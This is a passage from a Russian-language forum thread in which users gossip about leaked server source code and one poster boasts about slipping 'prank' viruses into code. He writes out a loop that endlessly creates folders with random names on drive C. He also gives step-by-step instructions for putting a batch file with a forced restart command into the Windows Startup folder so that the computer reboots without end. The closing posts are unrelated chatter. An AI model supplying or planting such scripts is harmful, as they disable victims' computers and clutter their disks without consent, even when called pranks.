да полтергейст призрак или просто саня. он хотел купить
удачи, винни иму точно не продаст
интереснинько что этот призрак будет делать с этим сорсом, сольёт всем? или поломает там всё?
мне хотел дать, чтобы я типо на моём серваке поднял хахахахаххахахахахахахахахахахахахахахахахахахахахахахахахахахаха!
напихает в исходники вирусы, и будет разливать эту отраву по тиам толкам.
кстати я любил пихать вирусы в исходники один раз, но это просто был пранковирус, он не причинял вред!
я люблю писать батники, например у меня есть 1, который одкрывает эксплорер кучу раз,
или создает милион папок по всему пк!
func make_million_folders() while true directoryCreate("c:\fuck"&random(0,10000000,1)) wend endfunc
создаёт папки в локальном диске ц
а мне некий игорь бакулин подсунул вирус с цикличной перезагрузкой
просто пишешь батник с текстом shutdown -r -f и суёшь его в стартап компа. стартап открывается так windows+r просто пишешь в окно shell:startup и вставляешь в папку свой батник. после перезагрузки компа он будет просто бесконечно перезагружаться.
Seva — Post 37 of 38
2021-08-28 11:52
Может, человек учит русский язык и хочет практиковаться, говоря на интересующие его темы? -- (franklin): тогда зачем было создавать тут это! --
да, правильно. просто я не правильно выразился. человек не понял фразу: что за воркрай и сбп. не понял что это значит. вот и всё.